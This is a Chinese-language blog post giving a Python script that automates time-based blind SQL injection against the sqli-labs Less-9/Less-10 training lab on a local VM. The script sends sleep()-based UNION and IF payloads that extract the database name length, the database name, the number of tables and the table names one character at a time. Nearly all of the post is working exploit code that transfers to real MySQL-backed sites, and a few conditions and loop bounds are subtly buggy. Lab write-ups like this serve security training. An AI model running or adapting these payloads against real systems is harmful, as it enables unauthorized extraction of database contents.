sql-labs Time-based盲注脚本

    sqli-labs lab9/lab10是基于时间的盲注，如果完全用手动注入，费时费力。想到之前写过一篇基于布尔盲注的博文，于是我把当时脚本中的payload进行了修改，记录于此。

    相比之前的脚本，替换了payload。另外，脚本记录了发送请求前的时间和响应返回的时间，比较时间差是否大于payload中设置的sleep时间（因为测试用的服务器就在本地虚拟机里，几乎不会有延迟，所以可以这么简单的比较时间差）。

import requests
import time

MAX_DBName_len = 100
MAX_TableName_len = 100
MAX_ColumnName_len = 100
MAX_Data_len = 100
MAX_Table_Num = 100
MAX_Column_Num = 100
MAX_Data_Num = 100

chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$%^&*()'
        
target_url = "http://192.168.119.135/sqli-labs/Less-9/?id=1"      


def get_DBName_len():
    print("Start to get DBName_len...")
    DBName_len = 0
    url_template = target_url + "' union select 1,2,if (length(database())={0},sleep(3),null) %2D%2D%20"
    
    for i in range(0, MAX_DBName_len):
        starttime = time.time()
        url = url_template.format(i)
        response = requests.get(url)
        
        if time.time()-starttime > 3:
            DBName_len = i;
            print("DBName_len is: ", DBName_len)
            break;
        
    if DBName_len == 0:
        if i == MAX_DBName_len - 1:
            print("DBName_len > MAX_DBName_len!")
        print("Cannot get DB_len. Program ended.")
        exit()
    return DBName_len

def get_DBName(DBName_len):
    print("Start to retrieve database name...")
    DBName = ""
    url_template = target_url + "' union select 1,2, if(ascii(substr(database(),{0},1))={1},sleep(2),null) %2D%2D%20"   
    for i in range(1, DBName_len + 1):
        tempDBName = DBName
        for char in chars:
            char_ascii = ord(char)
            url = url_template.format(i, char_ascii)
            starttime = time.time()
            response = requests.get(url)
            if time.time()-starttime > 2:
                DBName += char
                break
        if tempDBName == DBName:
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! DBName is: " + DBName)
    return DBName

def get_TableNumOfDB(DBName):
    print("Start to get TableNumOfDB...")
    TableNumOfDB = 0
    url_template = target_url + "' and if ((select count(table_name)a from information_schema.tables where table_schema = database() having a={0}),sleep(2),true)  %2D%2D%20"
    for i in range(0, MAX_Table_Num):
        url = url_template.format(i)
        starttime = time.time()
        response = requests.get(url)
        if time.time()-starttime > 2:
            TableNumOfDB = i;
            print("the number of table is:" , TableNumOfDB)
            break
    if TableNumOfDB == 0:
        if i == TableNumOfDB - 1:
            print("table number of database > MAX_TableName_len!")
    return TableNumOfDB

def get_TableName_len(Table_num):
    print("Start to get TableName_len...")
    TableName_len = 0
    url_template = target_url + "' and if (( (select length(table_name) from information_schema.tables where table_schema = database() limit {0},1)={1}),sleep(2),true)   %2D%2D%20"
    for i in range(0, MAX_TableName_len):
        url = url_template.format(Table_num - 1, i)
        starttime = time.time()
        response = requests.get(url)
        if time.time()-starttime > 2:
            TableName_len = i
            break
    if TableName_len == 0:
        if i == MAX_TableName_len - 1:
            print("TableName_len > MAX_TableName_len!")
    return TableName_len

def get_TableName(Table_num, TableName_len):
    print("Start to get TableName...")
    TableName = ""
    url_template = target_url + "' and if ((ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {0},1),{1},1))={2}),sleep(2),true)  %2D%2D%20"   
    for i in range(1, TableName_len + 1):
        tempTableName = TableName
        for char in chars:
            char_ascii = ord(char)
            url = url_template.format(Table_num - 1, i, char_ascii)
            starttime = time.time()
            response = requests.get(url)
            if time.time()-starttime > 2:
                TableName += char
                break           
        if tempTableName == TableName:
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! TableName is: " + TableName)
    return TableName

#print("tables in "+DBName+":")
for i in range(0,4+1):
    TableName_len = get_TableName_len(i)
    TabName = get_TableName(i,TableName_len)